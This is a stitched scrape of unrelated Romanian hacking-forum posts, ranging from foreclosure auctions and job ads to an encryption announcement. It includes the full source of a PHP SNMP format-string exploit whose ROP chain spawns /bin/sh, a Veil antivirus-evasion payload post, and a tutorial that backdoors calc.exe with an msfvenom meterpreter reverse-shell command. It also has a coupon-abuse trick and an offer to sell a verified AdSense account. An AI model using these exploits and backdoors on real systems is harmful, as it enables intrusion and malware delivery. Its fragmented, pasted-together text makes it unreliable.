Leaderboard

1. Nu imi par deloc mici preturile . 2. Dupa ce castigi licitatia, poate dura si 2 ani pana intri in posesia bunului . 3. La apartamente e jale mare , majoritatea nu le poti vedea inainte de licitatie . 4. Cand vei vedea ca dai afara in ploaie 2- 3 copii plangand , nu cred ca o sa mai ai acelasi entuziasm . 5. Majoritatea celor executati sunt oameni onesti , nu merita asta . Pentru niste bancnote sa distrugi viata unei familii , chiar nu mi se pare in regula.

@NETGEAR ,majoritatea celor executati sunt victimele bancilor din punct de vedere informational . Intamplator,in perioada cand se dadeau la greu credite in franci elvetieni,am contractat un credit de la o banca ,mai exact 60 mii lei . Mi-au dat doua variante : sa iau lei si sa platesc 1400 lei rata sau sa iau franci si sa platesc 1000 lei rata(echivalent) . Eu am ales lei si am fost un caz fericit ,cu toate ca la prima vedere am parut nebun . Foarte multi (majoritatea) au eles franci ,pentru ca era foarte tentant (mai ales la sune mari) si au ajuns acum in imposibilitatea de a achita rata lunara. Asta a fost doar un exemplu ,iti pot da si altele . Am ceva "experienta" in banci .

This archive contains all of the 196 exploits added to Packet Storm in March, 2016. Content: Directory of 1603-exploits 03/21/2016 07:04 PM 2,220 ABSOLUTETELNET-DLL-HIJACK.txt 03/22/2016 03:00 AM 471 achievo145-xss.txt 03/17/2016 08:39 AM 1,428 akips-exec.txt 03/31/2016 03:07 AM 6,288 apache_jetspeed_file_upload.rb.txt 03/03/2016 04:12 AM 5,037 applocker_bypass.rb.txt 03/08/2016 02:30 AM 4,455 atutorlms-exec.txt 03/30/2016 02:35 AM 13,044 atutor_filemanager_traversal.rb.txt 03/01/2016 05:17 PM 10,902 atutor_sqli.rb.txt 03/31/2016 07:44 AM 664 axilcms01-sql.txt 03/31/2016 06:33 AM 689 axilcms3-xss.txt 03/18/2016 06:48 PM 5,266 bigtree428-inject.txt 03/28/2016 02:11 PM 1,866 c2box-bypass.txt 03/17/2016 08:51 AM 2,088 ciscoucs-exec.txt 03/07/2016 01:33 PM 2,427 clamwin-dllhijack.txt 03/29/2016 02:40 AM 2,257 cogentdatahub-escalate.txt 03/24/2016 02:16 AM 2,710 comodo-dllhijack.txt 03/11/2016 07:12 AM 10,651 CORE-2016-0003.txt 03/11/2016 07:15 AM 19,515 CORE-2016-0004.txt 03/17/2016 08:45 AM 11,992 CORE-2016-0005.txt 03/31/2016 02:41 AM 970,293 COSIG-2016-14-15-16.tgz 03/30/2016 06:39 PM 6,099 cubecart6010-sqlxssxsrf.txt 03/31/2016 02:32 AM 922 CVE-2016-0784.txt 03/11/2016 06:56 AM 10,584 cve-2016-2563.tgz 03/19/2016 03:05 AM 5,874 datingpro-xsrf.txt 03/29/2016 06:14 PM 3,650 desktopcentral-xss.txt 03/28/2016 07:44 AM 1,498 dlinkdvg5402sp-xsrf.txt 03/21/2016 06:50 PM 2,119 dlinkdwr932-bypass.txt 03/21/2016 08:55 AM 644 dorg-sqlxss.txt 03/15/2016 09:22 PM 18,254 dropbearsshd-bypass.txt 03/30/2016 06:28 PM 6,530 ehcp-bypassupload.txt 03/08/2016 11:11 PM 645 exim-escalate.txt 03/15/2016 02:50 AM 6,923 Exim-Local-Root-Privilege-Escalation.txt 03/29/2016 04:33 PM 1,821 firewarextm-redirect.txt 03/24/2016 06:55 PM 712 Forsploit.py.txt 03/19/2016 04:11 PM 1,342 fortios-redirectxss.txt 03/18/2016 06:55 PM 4,712 grandstream-redir.txt 03/04/2016 04:07 AM 1,832 GS20160304010751.tgz 03/05/2016 04:11 AM 112,325 GS20160305011130.tgz 03/07/2016 05:44 PM 1,547 GS20160307233508.tgz 03/11/2016 04:22 AM 1,977 GS20160311042036.tgz 03/16/2016 09:18 PM 2,289 GS20160317052509.tgz 03/16/2016 08:22 PM 1,833 GS20160317053119.tgz 03/17/2016 08:33 AM 2,503 GS20160317053347.tgz 03/17/2016 08:35 AM 2,788 GS20160317053502.tgz 03/17/2016 08:36 AM 2,785 GS20160317053619.tgz 03/19/2016 03:00 AM 2,272 GS20160319000832.tgz 03/22/2016 03:09 AM 1,697 GS20160322000957.tgz 03/22/2016 03:11 AM 1,974 GS20160322001128.tgz 03/22/2016 03:17 AM 1,715 GS20160322001342.tgz 03/22/2016 03:19 AM 1,886 GS20160322001921.tgz 03/22/2016 03:22 AM 2,731 GS20160322002200.tgz 03/22/2016 03:23 AM 1,705 GS20160322002341.tgz 03/23/2016 02:39 AM 3,342 GS20160322233924.tgz 03/23/2016 02:42 AM 2,014 GS20160322234207.tgz 03/23/2016 02:43 AM 1,952 GS20160322234346.tgz 03/23/2016 02:44 AM 1,694 GS20160322234451.tgz 03/23/2016 02:46 AM 1,411 GS20160322234611.tgz 03/23/2016 02:48 AM 1,144 GS20160322234851.tgz 03/23/2016 02:49 AM 1,959 GS20160322234954.tgz 03/23/2016 02:51 AM 1,980 GS20160322235135.tgz 03/23/2016 02:53 AM 1,981 GS20160322235307.tgz 03/23/2016 02:54 AM 1,139 GS20160322235438.tgz 03/23/2016 02:55 AM 1,782 GS20160322235529.tgz 03/23/2016 01:22 AM 1,058 GS20160322235642.tgz 03/23/2016 02:58 AM 1,401 GS20160322235811.tgz 03/23/2016 03:00 AM 2,094 GS20160323000002.tgz 03/23/2016 03:02 AM 3,188 GS20160323000202.tgz 03/23/2016 03:04 AM 2,852 GS20160323000415.tgz 03/23/2016 03:21 AM 2,219 GS20160323002103.tgz 03/23/2016 03:22 AM 1,961 GS20160323002237.tgz 03/23/2016 03:25 AM 1,450 GS20160323002510.tgz 03/23/2016 03:26 AM 5,826 GS20160323002624.tgz 03/25/2016 11:22 PM 1,315 GS20160325232526.tgz 03/25/2016 07:22 PM 4,902 GS20160325232718.tgz 03/28/2016 02:12 PM 4,822 GS20160328155434.tgz 03/29/2016 06:55 PM 6,197 GS20160330235852.tgz 03/31/2016 06:42 PM 2,784 GS20160331154242.tgz 04/01/2016 02:34 AM 1,581 GS20160331233412.tgz 04/01/2016 02:35 AM 2,328 GS20160331233533.tgz 04/01/2016 02:36 AM 1,659 GS20160331233658.tgz 04/01/2016 02:38 AM 2,479 GS20160331233817.tgz 04/01/2016 02:39 AM 1,503 GS20160331233926.tgz 04/01/2016 02:40 AM 1,828 GS20160331234039.tgz 03/24/2016 02:29 AM 4,088 h264-dvr-rce.py.txt 03/19/2016 03:03 AM 4,231 itop-xsrf.txt 03/23/2016 03:00 AM 718 joomlaeytg102-sql.txt 03/23/2016 03:00 AM 1,614 joomlaicagenda-xss.txt 03/12/2016 11:22 PM 4,345 kaltura-execuploadfileread.txt 03/04/2016 01:22 AM 5,151 liferay512-xss.txt 03/16/2016 07:17 PM 1,844 litecartcms-xss.txt 03/24/2016 03:44 PM 2,112 lithiumkb-xss.txt 03/09/2016 07:44 PM 5,665 LSE-2016-01-01.txt 03/07/2016 01:32 PM 3,483 mbam-dllhijack.txt 03/05/2016 04:09 AM 9,832 mcafeevses-bypass.txt 03/31/2016 06:06 PM 4,195 meea-xss.txt 03/31/2016 02:52 AM 3,840,115 metaphor-stagefright.tgz 03/01/2016 05:12 PM 2,265 MICROSOFT-PPT-VIEWER-CODE-EXEC.txt 03/16/2016 07:11 PM 1,149 netgearcg3000-bypass.txt 03/13/2016 01:22 AM 5,543 netgearreadynas-exec.txt 03/16/2016 07:04 PM 18,512 opensshfalse-bypass.txt 03/09/2016 07:46 PM 26,493 OSS-2016-05_aiptek.txt 03/09/2016 07:48 PM 26,517 OSS-2016-06_cdc_acm.txt 03/09/2016 07:50 PM 28,311 OSS-2016-07_cypress_m8.txt 03/09/2016 07:57 PM 27,815 OSS-2016-08_mct_u232.txt 03/09/2016 07:58 PM 26,958 OSS-2016-09_visor_clie_5_attach.txt 03/09/2016 08:00 PM 27,717 OSS-2016-10_visor_treo_attach.txt 03/09/2016 08:01 PM 50,845 OSS-2016-11_wacom.txt 03/09/2016 08:03 PM 26,477 OSS-2016-12_digi_acceleport.txt 03/12/2016 05:44 PM 27,188 OSS-2016-13_powermate.txt 03/12/2016 05:45 PM 27,911 OSS-2016-14_gtco.txt 03/12/2016 06:20 PM 27,599 OSS-2016-15_iowarrior.txt 03/12/2016 07:32 PM 27,185 OSS-2016-16_snd-usb-audio.txt 03/12/2016 08:32 PM 26,819 OSS-2016-17_snd-usb-audio.txt 03/12/2016 09:32 PM 51,078 OSS-2016-18_ati_remote2.txt 03/31/2016 08:55 AM 9,664 php5533-invalidwrite.txt 03/11/2016 07:25 AM 2,063 php_utility_belt_rce.rb.txt 03/18/2016 06:47 PM 1,754 pivotx2311-shell.txt 03/18/2016 06:45 PM 2,085 pivotx2311-traversal.txt 03/18/2016 06:43 PM 1,482 pivotx2311-xss.txt 03/17/2016 04:56 PM 4,128 projectsendr582-xss.txt 03/03/2016 03:02 AM 1,244 pulsecms452-disclose.txt 03/02/2016 05:01 PM 1,891 putty066-dllhijack.txt 03/22/2016 06:03 PM 5,308 rt-sa-2016-002.txt 03/04/2016 03:41 AM 4,667 schneiderelectric-credexecescalate.txt 03/11/2016 07:09 AM 520,775 SE-2012-01-ORACLE-14.tgz 03/03/2016 03:02 AM 1,492,772 secretnet_expl-master.zip 03/27/2016 02:11 PM 2,863 smsofttech-sql.txt 03/13/2016 01:02 AM 1,549 soundybm-xss.txt 03/21/2016 03:22 AM 4,803 sysax650-sehoverflow.txt 03/05/2016 04:02 AM 5,423 SYSS-2015-053.txt 03/01/2016 05:01 PM 6,840 SYSS-2015-066.txt 03/01/2016 04:55 PM 5,077 SYSS-2015-067.txt 03/01/2016 04:58 PM 5,241 SYSS-2015-069.txt 03/01/2016 04:54 PM 5,655 SYSS-2015-070.txt 03/01/2016 04:56 PM 6,661 SYSS-2015-071.txt 03/01/2016 04:59 PM 5,594 SYSS-2015-072.txt 03/01/2016 04:58 PM 4,964 SYSS-2015-073.txt 03/01/2016 05:06 PM 4,862 SYSS-2016-009.txt 03/24/2016 10:32 PM 5,006 SYSS-2016-016.txt 03/24/2016 10:33 PM 4,712 SYSS-2016-017.txt 03/25/2016 02:02 AM 4,950 SYSS-2016-018.txt 03/29/2016 02:38 AM 687 tallsoft-dos.txt 03/09/2016 07:42 PM 3,645 thomsontwg8504u-xsrfxss.txt 03/28/2016 06:52 PM 15,239 TRENDMICRO-DDI-CSRF.txt 03/30/2016 06:33 AM 16,565 VL-1627.txt 03/31/2016 06:36 PM 24,540 VL-1694.txt 03/14/2016 01:11 PM 6,744 VL-1777.txt 03/16/2016 03:02 AM 10,147 VL-1781.txt 03/24/2016 02:21 AM 4,224 VL-1783.txt 03/31/2016 09:55 AM 8,023 VL-1784.txt 03/31/2016 06:28 PM 6,932 VL-1785.txt 03/24/2016 09:02 PM 4,329 VL-1788.txt 03/31/2016 06:29 PM 5,689 VL-1802.txt 03/31/2016 06:31 PM 5,787 VL-1803.txt 03/31/2016 06:33 PM 6,772 VL-1804.txt 03/31/2016 06:38 PM 8,420 VL-1806.txt 03/31/2016 06:35 PM 6,172 VL-1807.txt 03/04/2016 03:37 AM 9,074 wago-credsprivdisclose.txt 03/27/2016 02:12 PM 3,284 wapmusiccms-sql.txt 03/19/2016 03:07 AM 4,232 websitebaker-sql.txt 03/21/2016 08:22 AM 628,511 wildfly-bypass.tgz 03/21/2016 07:22 AM 580 wpabtest-lfi.txt 03/09/2016 06:55 PM 38,332 WPAdvancedComment010-xss.pdf 03/23/2016 03:29 AM 1,478 wpbrandfolder-rfilfi.txt 03/03/2016 07:51 PM 3,638 wpbulkdelete-escalate.txt 03/15/2016 06:33 AM 1,180 wpbulletproof0532-xss.txt 03/28/2016 06:34 PM 2,879 wpclaptasticclap-xss.txt 03/28/2016 06:35 PM 2,753 wpcloudflare-xss.txt 03/02/2016 05:04 PM 5,665 wpcppolls108-xsrfxss.txt 03/02/2016 04:33 PM 3,403 wpcppolls108-xssupload.txt 03/23/2016 03:30 AM 887 wpdharmabooking-rfilfi.txt 03/12/2016 07:22 PM 2,306 wpdwquestionanswer-xss.txt 03/21/2016 10:22 AM 614 wpebookdownload-traversal.txt 03/12/2016 05:03 PM 1,551 wpemailencoderbundle-xss.txt 03/24/2016 02:19 AM 3,043 wpfacebookwl-sqlxss.txt 03/01/2016 05:05 PM 2,339 wpgravityforms-xss.txt 03/22/2016 05:59 PM 809 wphbaudiogallerylite-download.txt 03/28/2016 06:38 PM 601 wpimdb-lfi.txt 03/21/2016 09:22 AM 740 wpimportcsv-traversal.txt 03/24/2016 02:20 AM 612 wpissuupanel-rfilfi.txt 03/24/2016 02:18 AM 1,048 wpmailchimpsf-exec.txt 03/12/2016 05:44 PM 1,355 wpmailtolinks-xss.txt 03/23/2016 03:32 AM 1,300 wpmemphisdoclib-download.txt 03/28/2016 06:35 PM 2,750 wpmusicstore-xss.txt 03/28/2016 06:40 PM 825 wpphotocartlink-lfi.txt 03/07/2016 11:32 PM 4,815 wpspprojectsdm-sqlexecuploadxss.txt 03/28/2016 06:37 PM 2,755 wpvisualformbuilder-xss.txt 03/11/2016 07:00 AM 19,807 X41-2016-001.txt 03/19/2016 02:59 AM 2,343 XOOPS-CSRF.txt 03/19/2016 02:58 AM 2,161 XOOPS-DIRECTORY-TRAVERSAL.txt 03/18/2016 06:42 PM 3,159 zenphoto1411-rfi.txt 03/01/2016 05:08 PM 3,763 ZSL-2016-5309.tgz 03/01/2016 05:10 PM 5,410 ZSL-2016-5310.txt 03/16/2016 05:47 AM 3,472 ZSL-2016-5311.txt 03/31/2016 02:33 AM 4,367 ZSL-2016-5312.txt 03/24/2016 02:35 AM 3,498 zyxelmax3xx-hardcoded.txt 197 File(s) 8,745,358 bytes 2 Dir(s) 5,041,963,008 bytes free Download 1603-exploits.tgz (7.7 MB)

Cursuri Linux facute foarte frumos limba Engleza si Germana LPI101 44 Videos | Durata 412:06 min http://www.learnity.com/kursdetails.html?Tutorialid=1471&F[tcid1]=3&F[tcid2]=409&F[tcid3]=421&F[Profileid]=851&F[OrderBy]=newest LPI102 34 Videos | Durata 451:32 min http://www.learnity.com/kursdetails.html?Tutorialid=1473&F[tcid1]=3&F[tcid2]=409&F[tcid3]=421&F[Profileid]=851&F[OrderBy]=newest

http://themadroller.com/

Practic dacă ești persoană juridică și ai infrastructură cibernetică (adică orice infrastructură care procesează date cu caracter personal, adică toate, că mă îndoiesc că sunt persoane juridice fără să proceseze măcar ceva date personale, fie ele și niște facturi) ei sunt șefii tăi. Alte păreri la Bogdan Manolea, pentru cine știe: https://privacy.apti.ro/2016/01/29/noua-propunere-de-lege-a-securitatii-cibernetice-de-ce-e-aceiasi-marie-cu-alta-palarie/

Niste rapoarte (4 la numar) excelente intocmite de BMI referitoare la piata IT din Romania pe fiecare quarter din 2015. Acestea includ SWOT analysis, industry forecast pe 5 ani, economic analysis si multe alte informatii utile. De recomandat in special celor ce vor sa porneasca o afacere in domeniul IT in Romania - pentru a intelege mai bine contextul, trenduri, etc. Cei de la BMI Research apartin de Fitch Group si produc research de calitate, credibil. Download: aHR0cDovL3dlLnRsL0phWGZJS3JSalo= (Link disponibil 7 zile. Pentru re-upload pm me)

1. Go to http://www.easyname.com 2. Register any .com domain of your choice. 3. Add to cart. 4. Go and add a 20gb hosting plan on your cart as well. 5. Redeem these 2 coupons. T26G8MPC3 & HA26GVFW5 6. Your cart total should now be $0.00 Am luat eu acu 5 min ,nu am avut chef sa traduc dar cred ca va descurcati voi

EXPLOITING BUFFER OVERFLOWS ON MIPS ARCHITECTURES A Walkthrough by Lyon Yang @l0Op3r Editing and Support: Bernhard Mueller Table of Contents 1. Introduction............................................................................................................. 3 2. Triggering and Debugging the Exploit....................................................................... 3 3. Cache Incoherency ................................................................................................... 7 4. Overcoming ASLR..................................................................................................... 8 5. Using ROP Gadgets .................................................................................................. 9 6. Writing the exploit – Calculating Offsets ................................................................ 14 7. Writing the exploit – Writing the MIPS Shellcode Encoder ..................................... 17 8. Writing the exploit – fork() Shellcode..................................................................... 22 Download: https://www.exploit-db.com/docs/39658.pdf

Caut 1,2 oameni pe front-end, cu cunostinte cel putin medii de JavaScript si foarte bune de CSS / HTML / Bootstrap. De asemenea caut designer cu experienta in template-uri, logo-uri si UX. Posturile sunt full time, in Bucuresti, cu program flexibil si posibilitate de lucru si de acasa cat timp se incadreaza in limita bunului simt si se livreaza conform asteptarilor. Salariul se negociaza in functie de experienta si cunostinte, rezultatele la un test dat ulterior primei intalniri primeaza in fata unui CV stufos. Detalii prin PM.

WhatsApp has always prioritized making your data and communication as secure as possible. And today, we're proud to announce that we've completed a technological development that makes WhatsApp a leader in protecting your private communication: full end-to-end encryption. From now on when you and your contacts use the latest version of the app, every call you make, and every message, photo, video, file, and voice message you send, is end-to-end encrypted by default, including group chats. The idea is simple: when you send a message, the only person who can read it is the person or group chat that you send that message to. No one can see inside that message. Not cybercriminals. Not hackers. Not oppressive regimes. Not even us. End-to-end encryption helps make communication via WhatsApp private – sort of like a face-to-face conversation. If you're interested in learning more about how end-to-end encryption works, you can read about it here. But all you need to know is that end-to-end encrypted messages can only be read by the recipients you intend. And if you're using the latest version of WhatsApp, you don't have to do a thing to encrypt your messages: end-to-end encryption is on by default and all the time. We live in a world where more of our data is digitized than ever before. Every day we see stories about sensitive records being improperly accessed or stolen. And if nothing is done, more of people's digital information and communication will be vulnerable to attack in the years to come. Fortunately, end-to-end encryption protects us from these vulnerabilities. Encryption is one of the most important tools governments, companies, and individuals have to promote safety and security in the new digital age. Recently there has been a lot of discussion about encrypted services and the work of law enforcement. While we recognize the important work of law enforcement in keeping people safe, efforts to weaken encryption risk exposing people's information to abuse from cybercriminals, hackers, and rogue states. While WhatsApp is among the few communication platforms to build full end-to-end encryption that is on by default for everything you do, we expect that it will ultimately represent the future of personal communication. The desire to protect people's private communication is one of the core beliefs we have at WhatsApp, and for me, it's personal. I grew up in the USSR during communist rule and the fact that people couldn't speak freely is one of the reasons my family moved to the United States. Today more than a billion people are using WhatsApp to stay in touch with their friends and family all over the world. And now, every single one of those people can talk freely and securely on WhatsApp. Jan and Brian source : https://blog.whatsapp.com/10000618/end-to-end-encryption?

Salut, Sursa de download se tot schimba, eu incerc sa tin pasul cu voi, daca nu merge link ul de download lasati coment si eu o sa l pun iar. https://mega.nz/#F!90RmXZYZ!gop6iYHkrQ_2NP7ZzD-1xw

http://www.comunicatii.gov.ro/legea-privind-securitatea-cibernetica-a-romaniei-versiunea-finala/ publicata la 04.04.2016.

Am aruncat un ochi peste licitatiile de pe executari dot com iar preturile de acolo mi se par prea bune, perfecte pentru o bijnita. Cineva cu experienta in licitatiile de bunuri executate silit ? Ati mai participat la astfel de licitatii ? Ceva cerinte ? Un om de rand poate castiga una ?

D.p.d.v al timpului de rulare, asta ar fii cea mai buna metoda de a calcula o serie fibonnaci in python: def moloz(n): a, b = 0, 1 for i in range(n): a, b = b, a + b return a

Da, peste 90% din ele au stealer, keylogger, cryptolocker si alte magarii. O sa dau o geana pe cel mentionat de Byte-ul

@infinite Daca iti sunt de folos si vrei, lasa o donatie aici. 2015, valabil 7 zile: aHR0cHM6Ly93ZS50bC9XUHlxUTRJZDBh

Cunosc caz cand executorul a pus poprire inante ca hotararea judecatoreasca sa fie redacata si publicata, ceea ce nu ii legal neputandu-se face recurs. Plus ca a pus poprire pe toate conturile firmei ajungandu-se ca suma initiala sa fie blocata de 5-6 ori. Alt caz in care administrator firmei executate statea si licita peste nu cumva sa ii ia cineva bunurile. A bagat firma in faliment ca nu a avut chef sa isi plateasca datoriile la furnizori si sa ramana si fara bani. Sa nu vorbin de aia care si-au subestimat valorea bunurilor din firma si tot ei le-au cumparat prin intermediari si mana in mana cu executorul care a publicat anuntul de scoatere la licitatie pe ceva perete uitat de lume. Numai la avocati, tribunale si medici, spitale sa nu ajungi in Romania ca ii jale.

Dau cont Adsense verificat, pin Romania, ultima plata 22 martie..150 ron..detalii pm

Oricum s-a sfarsit metoda s-a atins limita + s-a laudat unul ca a trimis email sa se inchida oferta.

Cum crezi ca e mai bine sa implementezi acest algoritm? Recursiv sau iterativ?

PHP <= 7.0.4/5.5.33 - SNMP Format String Exploit <?php // PHP <= 7.0.4/5.5.33 SNMP format string exploit (32bit) // By Andrew Kramer <andrew at jmpesp dot org> // Should bypass ASLR/NX just fine // This exploit utilizes PHP's internal "%Z" (zval) // format specifier in order to achieve code-execution. // We fake an object-type zval in memory and then bounce // through it carefully. First though, we use the same // bug to leak a pointer to the string itself. We can // then edit the global variable with correct pointers // before hitting it a second time to get EIP. This // makes it super reliable! Like... 100%. // To my knowledge this hasn't really been done before, but // credit to Stefan Esser (@i0n1c) for the original idea. It works! // https://twitter.com/i0n1c/status/664706994478161920 // All the ROP gadgets are from a binary I compiled myself. // If you want to use this yourself, you'll probably need // to build a new ROP chain and find new stack pivots for // whatever binary you're targeting. If you just want to get // EIP, change $stack_pivot_1 to 0x41414141 below. // pass-by-reference here so we keep things tidy function trigger(&$format_string) { $session = new SNMP(SNMP::VERSION_3, "127.0.0.1", "public"); // you MUST set exceptions_enabled in order to trigger this $session->exceptions_enabled = SNMP::ERRNO_ANY; try { $session->get($format_string); } catch (SNMPException $e) { return $e->getMessage(); } } // overwrite either $payload_{1,2} with $str at $offset function overwrite($which, $str, $offset) { // these need to be global so PHP doesn't just copy them global $payload_1, $payload_2; // we MUST copy byte-by-byte so PHP doesn't realloc for($c=; $c<strlen($str); $c++) { switch($which) { case 1: $payload_1[$offset + $c] = $str[$c]; break; case 2: $payload_2[$offset + $c] = $str[$c]; break; } } } echo "> Setting up payloads\n"; //$stack_pivot_1 = pack("L", 0x41414141); // Just get EIP, no exploit $stack_pivot_1 = pack("L", 0x0807c19f); // xchg esp ebx $stack_pivot_2 = pack("L", 0x0809740e); // add esp, 0x14 // this is used at first to leak the pointer to $payload_1 $leak_str = str_repeat("%d", 13) . $stack_pivot_2 . "Xw00t%lxw00t"; $trampoline_offset = strlen($leak_str); // used to leak a pointer and also to store ROP chain $payload_1 = $leak_str . // leak a pointer "XXXX" . // will be overwritten later $stack_pivot_1 . // initial EIP (rop start) // ROP: execve('/bin/sh',0,0) pack("L", 0x080f0bb7) . // xor ecx, ecx; mov eax, ecx pack("L", 0x0814491f) . // xchg edx, eax pack("L", 0x0806266d) . // pop ebx pack("L", 0x084891fd) . // pointer to /bin/sh pack("L", 0x0807114c) . // pop eax pack("L", 0xfffffff5) . // -11 pack("L", 0x081818de) . // neg eax pack("L", 0x081b5faa); // int 0x80 // used to trigger the exploit once we've patched everything $payload_2 = "XXXX" . // will be overwritten later "XXXX" . // just padding, whatevs "\x08X" . // zval type OBJECT str_repeat("%d", 13) . "%Z"; // trigger the exploit // leak a pointer echo "> Attempting to leak a pointer\n"; $data = trigger($payload_1); $trampoline_ptr = (int)hexdec((explode("w00t", $data)[1])) + $trampoline_offset; echo "> Leaked pointer: 0x" . dechex($trampoline_ptr) . "\n"; // If there are any null bytes or percent signs in the pointer, it will break // the -0x10 will be applied later, so do it now too if(strpos(pack("L", $trampoline_ptr - 0x10), "\x00") !== false || strpos(pack("L", $trampoline_ptr - 0x10), "%") !== false) { echo "> That pointer has a bad character in it\n"; echo "> This won't work. Bailing out... :(\n"; exit(); } echo "> Overwriting payload with calculated offsets\n"; // prepare the trampoline // code looks kinda like... // mov eax, [eax+0x10] // mov eax, [eax+0x54] // call eax overwrite(2, pack("L", $trampoline_ptr - 0x10), ); overwrite(1, pack("L", $trampoline_ptr - 0x54 + 4), $trampoline_offset); // exploit echo "> Attempting to pop a shell\n"; trigger($payload_2); // if we make it here, something didn't work echo "> Exploit failed :(\n"; Sursa: https://www.exploit-db.com/exploits/39645/

I know that many people use to work with mRemoteNG Dedicated Server, the software is good, but it has a big disadvantage - there is no possibility to make import from txt file in ip @ user format; pass. In this small utility made to solve this problem, a converter from .txt to xml format. I know you will like this tool:) Have fun !

Cei de la fundatia asta se ocupa cu asa ceva, gratuit: https://gloryholefoundation.com/ Succes!

http://x.co/stealphone

https://my.whdms.com/cart/add/125553912feda49b43a640d34c08de4e2734f4a3

Si eu am tot cautat si cu anunturi si nimic bun succes in continuare. Hertz de curiozitate care este oferta standard?

Salutare! E bine să acumulezi la început cât mai multe informații la nivel general pentru că există o oarecare legătură între toate. Trecând prin ramurile principale reușești să identifici ce îți place și o să vezi că ai o anumită afinitate spre un anumit domeniu. E bine să știi măcar un limbaj de programare sau măcar să ai habar cum funcționează un progrămel oricât de simplu, cum se compilează, ce se întâmplă în spate când se rulează. Nu toți sunt coderi însă niciunul n-a scăpat de șmirghel și ne-am lovit inevitabili de algoritmi sau măcar scripting. Recomand să descarci cursurile CEH(Certified Ethical Hacker) și să le citești, e multă teorie și vorbăraie însă o să-ți faci o idee despre tool-uri și ce aspecte implică un ethical hacking. După aceea dacă vrei hands-on există cursuri de la Offensive Security care o să stoarcă tot din tine însă o să rămâi cu experiență practică. Tutoriale, platforme de testare, CTF-uri găsești cu nemiluita. Trebuie doar să știi să le cauți pentru că ăsta este un skill esențial, săpatul după informații. O să deprinzi obiceiuri care te vor ajuta atunci când ai o problemă tehnică să știi unde să cauți și să adaptezi răspunsul la necesitățile tale. Și cel mai important atunci când dai de greu și ești mai adânc în rahat, nu trebuie să renunți. Succes!

[h=1]Veil – A Payload Generator to Bypass Antivirus[/h]Posted by CTruncer on May 30, 2013 NOTE: Please, be kind, and don’t submit any payloads to VirusTotal. On nearly every assessment, pen testers have to fight a battle against antivirus solutions. The level of effort that goes into each “battle” relies on the AV solution, its definitions, etc. Researching methods to bypass antivirus solutions has been an interest of mine on and off for the past 6 months. About two months ago I started to take a more serious look in how I could take my recent research and turn it into something that more usable and useful. I set out with a couple goals: Bypass common AV solutions that I/we routinely encounter in most network environments Utilize payloads that are compatible with the Metasploit framework, and expand upon these in future releases Attempt to make each payload file as random as possible With these goals in mind, I continued researching methods of bypassing AV. Since I wanted to maintain metasploit compatibility, I chose to use shellcode generated by the metasploit framework, specifically msfvenom. To accomplish this, I began looking into other available research, which is where I discovered a number of interesting techniques that a variety of people, such as Dave Kennedy and Debasish Mandal, already began to develop. From their research, I learned about really interesting ways to inject shellcode into memory through python. These methods were the foundation of the rest of my research. Since the majority of our assessment are against predominantly Windows environments, it was important that the tool worked reliably against these systems. Since I chose to write the tool in Python, I had to figure out how to package the Python output files containing the obfuscated shellcode to execute on Windows without requiring Python to be installed on the target machine. One of the solutions I looked into was using Py2Exe. I knew other software used this method to convert their Python-based scripts or tools into an executable that could run on Windows and figured I could do the same. I began testing Py2Exe with the payload files I developed and was successful running the executables on various versions of Windows, so I stuck with that solution. The final part was for me to develop a tool that automated the payload generation process, and I’m happy to release Veil. Note: Please be sure to check out https://www.veil-evasion.com, Veil’s website for the latest tutorials, updates, and repo location. Veil is currently capable of using 7 different methods to make 21 different payloads, all of which result in meterpreter connections. Veil provides the user with the option of using either Pyinstaller or Py2Exe to convert their python payload into an executable. With Pyinstaller, Veil users and have their file converted into an executable all within Kali and does not require the use of a second VM/Machine. When using Py2Exe,Veil will generate three files to which are required to create the final executable; a payload file (in Python), a file with runtime instructions for Py2Exe, and a batch script which handles converting the payload file into an executable. To generate the final payload, copy the three output files to a Windows host with Python, Py2Exe, and PyCrypto installed and execute the batch script. This will build the final executable that is uploaded to the target. The executable file can be dropped anywhere, on any Windows system, as all required libraries are stored within the exe file. Once dropped on a system and executed, the payload will result in a meterpeter callback that is undetected by AV. I’ve tested the packaged executable against multiple AV solutions (MSE, Kaspersky, AVG, Symantec, and McAfee), on both test systems and “in the wild,” and have a very high success rate, bypassing detection in almost every circumstance. I hope that, by releasing this tool, I can enable others in the community to provide more effective assessments by allowing them to focus their efforts on security risks and spend less time bypassing ineffective security measures that wouldn’t deter an actual adversary. Setup: For Kali: Run the setup script (setup.sh) and follow the installation process. Once the setup script has completed, delete the setup script. For Windows (when using Py2Exe) Install Python 2.7 - (tested with x86 – Python 2.7 Release) Install Py2Exe - (py2exe - Browse /py2exe/0.6.9 at SourceForge.net) Install PyCrypto - (The Voidspace Python Modules) Instructions for Use: Run Veil from Kali and generate your payload. If using Pyinstaller, your payload will be converted into an executable and is available for immediate use. If using Py2Exe Move the payload.py along with its two accompanying files onto your Windows machine (that already has python and the other dependencies from above installed). All three files should be placed in the root of the directory Python was installed to (likely C:\Python27). Run the batch script to convert the Python payload into an executable format. [*]Place the payload file on your target machine through any means necessary! Future Direction: Research new methods of encrypting or obfuscating the payload. Research other languages with direct access to the Windows API for delivering the payload. Want to play with Veil? Feel free to do so. Download, clone, do anything you’d like with it. You can download Veil here - https://github.com/ChrisTruncer/Veil. I hope that it can help others on their tests just as it has helped me. Please, if anyone has additional functionality they would like to add, I’d love to have input from the community! To learn how to effectively use Veil on assessments, and other Red Team techniques, check out our class at Blackhat USA 2013! And check out our Pen Testing class as well! References: Dave Kennedy - http://www.trustedsec.com/files/BSIDESLV_Secret_Pentesting_Techniques.pdf Debasish Mandal - Debasish Mandal's Blog: Execute ShellCode Using Python Sursa: https://www.christophertruncer.com/veil-a-payload-generator-to-bypass-antivirus/

Description: Today I am going to show you how to backdoor executables using msfvenom. This is a very handy tool in exploitaion. What is MSFVenom? MSFVEnom is a combination of MSFPayload and MSFEncode. It is a all in one framework that makes us easy in creating backdoor executables. In this tutorial I will backdoor calc.exe in a Windows XP SP2 system. I will use a reverse connection back to my back track machine. Our template is calc.exe and we will encode using x86/shikata_ga_nai encoder (I normally use this, you can use what ever you like) and encode this 10 times. So this will the parameter of using msfvenom. msfvenom -p windows/meterpreter/reverse_tcp LHOST= [ your local ip ] LPORT=[ your local port ] -x calc.exe -k -e x86/shikata_ga_nai -i 10 -f exe > calc_backdoor.exe I will break it down and exlain this for you. -p stands for our payload here i have used a meterpreter reverse connection which is awesome to use. LHOST is your local IP and LPORT is your local open port listening. -x is the template we are going to use or simply our custom executable. -k we use this option to start our payload in a new thread otherwise our win32 executable won't load into memory instead 